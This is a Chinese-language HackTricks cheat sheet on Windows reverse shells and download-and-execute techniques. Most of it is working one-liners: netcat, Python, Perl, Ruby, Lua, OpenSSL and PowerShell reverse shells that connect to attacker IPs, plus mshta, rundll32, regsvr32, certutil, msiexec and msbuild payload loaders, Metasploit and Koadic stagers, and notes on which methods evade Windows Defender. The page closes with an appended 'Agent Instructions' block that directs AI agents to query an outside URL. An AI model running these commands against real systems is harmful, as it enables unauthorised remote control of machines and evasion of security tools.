# Shells - Windows

从零开始学习AWS黑客技术，成为专家 htARTE（HackTricks AWS Red Team Expert）！

其他支持HackTricks的方式： * 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**，请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! * 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) * 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family)，我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family) * **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**。** * 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。

**Try Hard Security Group**

{% embed url="" %} *** ## Lolbas 页面[lolbas-project.github.io](https://lolbas-project.github.io/)是为Windows准备的，就像是为Linux准备的。\ 显然，在Windows中**没有SUID文件或sudo权限**，但了解一些**二进制文件**如何（被）滥用以执行某种意外操作，比如**执行任意代码**是很有用的。 ## NC ```bash nc.exe -e cmd.exe ``` ## SBD [**sbd**](https://www.kali.org/tools/sbd/)**是一种便携且安全的Netcat替代工具**。它适用于类Unix系统和Win32。具有强加密、程序执行、可定制源端口和持续重新连接等功能，sbd为TCP/IP通信提供了多功能解决方案。对于Windows用户，可以使用Kali Linux发行版中的sbd.exe版本作为可靠的Netcat替代品。 ```bash # Victims machine sbd -l -p 4444 -e bash -v -n listening on port 4444 # Atackers sbd 10.10.10.10 4444 id uid=0(root) gid=0(root) groups=0(root) ``` ## Python ## Python ```bash #Windows C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))" ``` ## Perl Perl是一种通用的脚本语言，可用于在Windows系统上执行各种任务。Perl脚本可以用于执行系统命令、文件操作、网络通信等操作。Perl在Windows系统上的使用非常灵活，可以通过Perl脚本轻松实现各种自定义功能。 ```bash perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' ``` ## Ruby ## Ruby ```bash #Windows ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' ``` ## Lua Lua是一种轻量级、高效的脚本语言，常用于嵌入式系统和游戏开发中。 Lua脚本可以通过C语言编写的解释器来运行。 Lua具有简洁的语法和强大的扩展能力，被广泛应用于各种领域。 Lua脚本可以通过调用系统命令执行操作系统级别的任务。 ```bash lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()' ``` ## OpenSSH 攻击者（Kali） ```bash openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate openssl s_server -quiet -key key.pem -cert cert.pem -port #Here you will be able to introduce the commands openssl s_server -quiet -key key.pem -cert cert.pem -port #Here yo will be able to get the response ``` 受害者 ```bash #Linux openssl s_client -quiet -connect :|/bin/bash|openssl s_client -quiet -connect : #Windows openssl.exe s_client -quiet -connect :|cmd.exe|openssl s_client -quiet -connect : ``` ## Powershell ## Powershell ```bash powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex" powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')" Start-Process -NoNewWindow powershell "IEX(New-Object Net.WebClient).downloadString('http://10.222.0.26:8000/ipst.ps1')" echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile ``` 执行网络调用的进程：**powershell.exe**\ 写入磁盘的有效负载：**否**（*至少在我使用procmon时找不到！*） ```bash powershell -exec bypass -f \\webdavserver\folder\payload.ps1 ``` 网络调用执行的进程：**svchost.exe**\ 写入磁盘的有效载荷：**WebDAV客户端本地缓存** **一行代码：** ```bash $client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() ``` **在本文末尾获取有关不同Powershell Shell的更多信息** ## Mshta * [从这里获取](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) ```bash mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")")) ``` ```bash mshta http://webserver/payload.hta ``` ```bash mshta \\webdavserver\folder\payload.hta ``` #### **hta-psh反向外壳示例（使用hta下载并执行PS后门）** ```xml ``` **您可以非常容易地使用stager hta下载并执行Koadic僵尸程序** #### hta示例 [**从这里**](https://gist.github.com/Arno0x/91388c94313b70a9819088ddf760683f) ```xml ``` #### **mshta - sct** [**从这里**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17) ```xml ``` #### **Mshta - Metasploit** Mshta is a utility in Windows that executes Microsoft HTML Applications (HTA). Metasploit has a module that can be used to execute malicious HTA payloads using mshta.exe. This technique can be used to bypass application whitelisting and execute code on a target system. ```bash use exploit/windows/misc/hta_server msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109 msf exploit(windows/misc/hta_server) > set lhost 192.168.1.109 msf exploit(windows/misc/hta_server) > exploit ``` ```bash Victim> mshta.exe //192.168.1.109:8080/5EEiDSd70ET0k.hta #The file name is given in the output of metasploit ``` **被防御者检测到** ## **Rundll32** [**Dll 你好世界示例**](https://github.com/carterjones/hello-world-dll) * [从这里](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) ```bash rundll32 \\webdavserver\folder\payload.dll,entrypoint ``` ```bash rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close(); ``` **被防御者检测到** **Rundll32 - sct** [**从这里**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17) ```xml ``` #### **Rundll32 - Metasploit** ```bash use windows/smb/smb_delivery run #You will be given the command to run in the victim: rundll32.exe \\10.2.0.5\Iwvc\test.dll,0 ``` **Rundll32 - Koadic** ```bash use stager/js/rundll32_js set SRVHOST 192.168.1.107 set ENDPOINT sales run #Koadic will tell you what you need to execute inside the victim, it will be something like: rundll32.exe javascript:"\..\mshtml, RunHTMLApplication ";x=new%20ActiveXObject("Msxml2.ServerXMLHTTP.6.0");x.open("GET","http://10.2.0.5:9997/ownmG",false);x.send();eval(x.responseText);window.close(); ``` ## Regsvr32 * [从这里](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) ```bash regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll ``` ``` regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll ``` **被防御者检测到** #### Regsvr32 -sct [**从这里开始**](https://gist.github.com/Arno0x/81a8b43ac386edb7b437fe1408b15da1) ```markup ``` #### **Regsvr32 - Metasploit** ```bash use multi/script/web_delivery set target 3 set payload windows/meterpreter/reverse/tcp set lhost 10.2.0.5 run #You will be given the command to run in the victim: regsvr32 /s /n /u /i:http://10.2.0.5:8080/82j8mC8JBblt.sct scrobj.dll ``` **您可以使用stager regsvr轻松下载并执行Koadic僵尸程序** ## Certutil * [从这里下载](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) 下载一个B64dll，解码并执行它。 ```bash certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll ``` 下载一个B64exe，解码并执行它。 ```bash certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe ``` **被防御者检测到** ## **Cscript/Wscript** ```bash powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://10.2.0.5:8000/reverse_shell.vbs',\"$env:temp\test.vbs\");Start-Process %windir%\system32\cscript.exe \"$env:temp\test.vbs\"" ``` **Cscript - Metasploit** ```bash msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 -f vbs > shell.vbs ``` **被防御者检测到** ## PS-Bat ```bash \\webdavserver\folder\batchfile.bat ``` 执行网络调用的进程：**svchost.exe**\ 写入磁盘的有效载荷：**WebDAV 客户端本地缓存** ```bash msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 > shell.bat impacket-smbserver -smb2support kali `pwd` ``` ```bash \\10.8.0.3\kali\shell.bat ``` **被防御者检测到** ## **MSIExec** 攻击者 ``` msfvenom -p windows/meterpreter/reverse_tcp lhost=10.2.0.5 lport=1234 -f msi > shell.msi python -m SimpleHTTPServer 80 ``` 受害者： ``` victim> msiexec /quiet /i \\10.2.0.5\kali\shell.msi ``` **检测到** ## **Wmic** * [从这里](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) ```bash wmic os get /format:"https://webserver/payload.xsl" ``` 示例xsl文件[在这里](https://gist.github.com/Arno0x/fa7eb036f6f45333be2d6d2fd075d6a7): ```xml ``` **未被检测** **您可以使用分段器wmic轻松下载并执行Koadic僵尸** ## Msbuild * [从这里](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) ``` cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml" ``` 你可以使用这种技术来绕过应用程序白名单和Powershell.exe限制。由于你将会收到一个PS shell提示。\ 只需下载这个文件并执行它： ``` C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildShell.csproj ``` **未被检测** ## **CSC** 在受害者机器上编译C#代码。 ``` C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:shell.exe shell.cs ``` 你可以从这里下载一个基本的C#反向shell： **未被检测** ## **Regasm/Regsvc** * [从这里获取](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) ```bash C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll ``` **我还没有尝试过** [**https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182**](https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182) ## Odbcconf * [从这里获取](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) ```bash odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt} ``` **我还没有尝试过** [**https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2**](https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2) ## Powershell Shells ### PS-Nishang 在**Shells**文件夹中，有许多不同的shell。要下载并执行Invoke-*PowerShellTcp.ps1*，请复制该脚本并附加到文件末尾： ``` Invoke-PowerShellTcp -Reverse -IPAddress 10.2.0.5 -Port 4444 ``` 在Web服务器上开始提供脚本，并在受害者端执行它： ``` powershell -exec bypass -c "iwr('http://10.11.0.134/shell2.ps1')|iex" ``` Defender尚未将其检测为恶意代码（截至2019年3月4日）。 **TODO: 检查其他nishang shells** ### **PS-Powercat** [**https://github.com/besimorhino/powercat**](https://github.com/besimorhino/powercat) 下载，启动Web服务器，启动监听器，并在受害者端执行： ``` powershell -exec bypass -c "iwr('http://10.2.0.5/powercat.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd" ``` **powercat提供的其他选项：** 绑定shell、反向shell（TCP、UDP、DNS）、端口重定向、上传/下载、生成载荷、提供文件... ``` Serve a cmd Shell: powercat -l -p 443 -e cmd Send a cmd Shell: powercat -c 10.1.1.1 -p 443 -e cmd Send a powershell: powercat -c 10.1.1.1 -p 443 -ep Send a powershell UDP: powercat -c 10.1.1.1 -p 443 -ep -u TCP Listener to TCP Client Relay: powercat -l -p 8000 -r tcp:10.1.1.16:443 Generate a reverse tcp payload which connects back to 10.1.1.15 port 443: powercat -c 10.1.1.15 -p 443 -e cmd -g Start A Persistent Server That Serves a File: powercat -l -p 443 -i C:\inputfile -rep ``` ### Empire 创建一个PowerShell启动器，保存到文件中，然后下载并执行它。 ``` powershell -exec bypass -c "iwr('http://10.2.0.5/launcher.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd" ``` **检测为恶意代码** ### MSF-Unicorn 使用unicorn创建metasploit后门的PowerShell版本 ``` python unicorn.py windows/meterpreter/reverse_https 10.2.0.5 443 ``` 使用创建的资源启动msfconsole： ``` msfconsole -r unicorn.rc ``` 在受害者上启动一个提供\_powershell\_attack.txt\_文件的Web服务器，并执行： ``` powershell -exec bypass -c "iwr('http://10.2.0.5/powershell_attack.txt')|iex" ``` **检测到恶意代码** ## 更多 [PS>Attack](https://github.com/jaredhaight/PSAttack) PS控制台，预装一些具有攻击性的PS模块（加密）\ [https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f9](https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f93c)[\ WinPWN](https://github.com/SecureThisShit/WinPwn) PS控制台，预装一些具有攻击性的PS模块和代理检测（IEX） ## 参考资料 * * * * * * * **Try Hard Security Group**

{% embed url="" %}

从零开始学习AWS黑客技术，成为专家 htARTE（HackTricks AWS Red Team Expert）！

支持HackTricks的其他方式： * 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**，请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! * 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) * 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family)，我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品 * **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**。** * 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://hacktricks.xsx.tw/generic-methodologies-and-resources/shells/windows.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.